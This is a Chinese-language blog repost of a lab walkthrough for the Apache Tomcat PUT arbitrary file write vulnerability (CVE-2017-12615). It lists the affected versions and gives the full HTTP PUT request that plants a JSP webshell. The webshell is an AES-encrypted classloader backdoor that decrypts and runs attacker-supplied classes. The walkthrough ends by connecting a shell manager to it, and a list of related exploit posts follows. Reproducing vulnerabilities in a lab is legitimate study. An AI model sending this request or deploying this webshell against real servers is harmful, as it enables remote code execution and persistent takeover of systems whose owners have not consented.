2. 程式人生 > 實用技巧 >Tomcat任意檔案寫入漏洞

Tomcat任意檔案寫入漏洞

阿新 發佈:2020-08-23

Tomcat任意檔案寫入漏洞

參考連結:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

靶場:vulfocus

環境:名稱: vulfocus/tomcat-cve_2017_12615

一、漏洞描述

Apache Tomcat 7.0.0到7.0.79版本中存在遠端程式碼執行漏洞,當 Tomcat 執行在 Windows 主機上,且啟用了 HTTP PUT 請求方法時,攻擊者可通過精心構造的攻擊請求向伺服器上傳包含任意程式碼的 JSP 檔案,檔案中的程式碼被伺服器執行。

二、影響版本

Apache Tomcat >=7.0.0,<=7.0.79

三、漏洞復現

1、訪問給出的地址;192.168.1.177:43999

2、抓包,然後直接修改為PUT請求方式,並且設定檔名為1.jsp(名字隨意),然後在下面直接填充jsp的shell即可,傳送成功後,正常情況下伺服器應該會返回狀態碼201,。

PUT /1.jsp/ HTTP/1.1
Host: 118.193.36.37:29618
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 611
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if(request.getParameter("pass")!=null){String k=(""+UUID.randomUUID()).replace("-","").substring(16);session.putValue("u",k);out.print(k);return;}Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec((session.getValue("u")+"").getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);%>

  

3、直接訪問1.jsp檔案,應該是存在的,但是由於我發包的時候伺服器沒有任何反應(具體的我也不知道發生了什麼),如下。

所以後面的步驟我主要來自:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

4、訪問1.jsp,存在

5、使用 shell 管理工具連線即可

相關推薦

Tomcat任意檔案寫入漏洞

Tomcat任意檔案寫入漏洞 參考連結:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

漏洞復現-CVE-2017-12615-tomcat PUT方法任意檔案寫入漏洞

0x00 實驗環境 攻擊機:Win 10 靶場:docker拉的vulhub靶場 0x01 影響版本 版本:Tomcat 7.x版本內conf/web.xml配置檔案內預設配置無readonly引數,需要手工新增,預設配置條件下不受此漏洞影響。

Tomcat任意檔案寫入(CVE-2017-12615)漏洞復現

漏洞描述 CVE-2017-12615:遠端程式碼執行漏洞 影響範圍:Apache Tomcat 7.0.0 - 7.0.79 (windows環境)

漏洞復現:ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)

一、漏洞描述 該漏洞出現在fileserver應用中,漏洞原理:ActiveMQ中的fileserver服務允許使用者通過HTTP PUT方法上傳檔案到指定目錄。Fileserver支援寫入檔案(不解析jsp),但是支援移動檔案(Move)我們可以將jsp的檔案PU

Tomcat 任意檔案上傳漏洞(CVE-2017-12615)

0x01簡介 2017年9月19日,Apache Tomcat官方確認並修復了兩個高危漏洞漏洞CVE編號:CVE-2017-12615和CVE-2017-12616,其中 遠端程式碼執行漏洞(CVE-2017-12615) 影響: Apache Tomcat 7.0.0 - 7.0.79(7.0.81修復不

Aapache Tomcat AJP 檔案包含漏洞(CVE-2020-1938)

0x01 簡介 Java 是目前 Web 開發中最主流的程式語言,而 Tomcat 是當前最流行的 Java 中介軟體伺服器之一,從初版釋出到現在已經有二十多年曆史,在世界範圍內廣泛使用。

CVE-2020-3452 CISCO ASA遠端任意檔案讀取漏洞

0x01 漏洞描述 Cisco官方 釋出了 Cisco ASA 軟體和 FTD 軟體的 Web 介面存在目錄遍歷導致任意檔案讀取 的風險通告,該漏洞編號為 CVE-2020-3452。 漏洞等級:中危。 通過shadon引擎的搜尋,目前全球大約有210,685個資

Openfire Admin Console SSRF&任意檔案讀取漏洞 CVE-2019-18394 CVE-2019-18393 poc

Openfire(以前稱為Wildfire和Jive Messenger)是一個即時通訊(IM)和群聊伺服器,它使用Java編寫的XMPP伺服器,並以Apache License 2.0釋出。

Tomcat AJP 檔案包含漏洞復現(CVE-2020-1938)

漏洞原理 Tomcat 伺服器是一個免費的開放原始碼的Web 應用伺服器,其安裝後會預設開啟ajp聯結器,方便與其他web伺服器通過ajp協議進行互動。

mysql任意檔案讀取漏洞復現

前言 第一次得知該漏洞後找了一些文章去看。 一開始不明白這個漏洞是怎麼來的,只知道通過在服務端執行poc指令碼就可以讀取客戶端的任意檔案,直接找到網上準備好的靶機進行測試,發現可行,然後就拿別人的poc試驗,

泛微雲橋e-Bridge-任意檔案讀取漏洞

1.資產查詢 Fofa: title="泛微雲橋 e-Bridge" 2.漏洞描述 泛微雲橋e-Bridge存在任意檔案讀取漏洞,攻擊者成功利用該漏洞,可實現任意檔案讀取,獲取敏感資訊。

Discuz!X ≤3.4 任意檔案刪除漏洞

Discuz!X ≤3.4 任意檔案刪除漏洞 簡述 漏洞原因:之前存在的任意檔案刪除漏洞修復不完全導致可以繞過。

Apache Ambari 公佈任意檔案下載漏洞

新春現金紅包與免費Linux基金會培訓&認證,等你來領!>>> 近日,Apache 官方公告了一個Apache Ambari 的任意檔案下載漏洞。Ambari的鑑權模組存在設計缺陷,惡意使用者可以繞過身份驗證,通過構

phpcms 9.6.1任意檔案下載漏洞分析

環境: phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影響版本: PHPCMS 9.6.1

Wordpress <= 4.9.6 任意檔案刪除漏洞

Wordpress <= 4.9.6 任意檔案刪除漏洞 前言 從 3.7.0 版本開始, WordPress 在使用者登入時,會在後臺對小版本的改變進行更新,這樣不利於我們分析程式碼。我們可以通過將 AUTOMATIC_UPDATER_DISABLED 設定成 t

若依(Ruoyi)管理系統後臺sql注入+任意檔案下載漏洞

0x00若依介紹 若依可以用於所有的Web應用程式,如網站管理後臺,網站會員中心,CMS,CRM,OA。所有前端後臺程式碼封裝過後十分精簡易上手,出錯概率低。同時支援移動客戶端訪問。系統會陸續更新一些實用功能。寓意

致遠A8任意檔案寫入+getshell(CNVD-2019-19299)

影響版本:致遠A8-V5協同管理軟體V6.1sp1 致遠A8+協同管理軟體V7.0、V7.0sp1、V7.0sp2、V7.0sp3

漏洞復現】CVE-2021-36749 Apache Druid LoadData 任意檔案讀取漏洞

0x00 漏洞詳情 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTPInputSource 來繞過應用程式級別的限制。攻擊者可利用該漏洞在未授權情況下,構造惡意請求執行檔案讀取,最終造成伺

Apache Druid LoadData 任意檔案讀取漏洞-CVE-2021-36749

漏洞原理: 由於使用者指定 HTTP InputSource 沒有做出限制,可以通過將檔案 URL 傳遞給 HTTP InputSource 來繞過應用程式級別的限制。由於 Apache Druid 預設情況下是缺乏授權認證,攻擊者可利用該漏洞在未授權情況

Grafana 未授權任意檔案讀取漏洞

漏洞原理:   Grafana是一個跨平臺、開源的資料視覺化網路應用程式平臺。使用者配置連線的資料來源之後,Grafana可以在網路瀏覽器裡顯示資料圖表和警告。Grafana 存在未授權任意檔案讀取漏洞,攻擊者在未經身份驗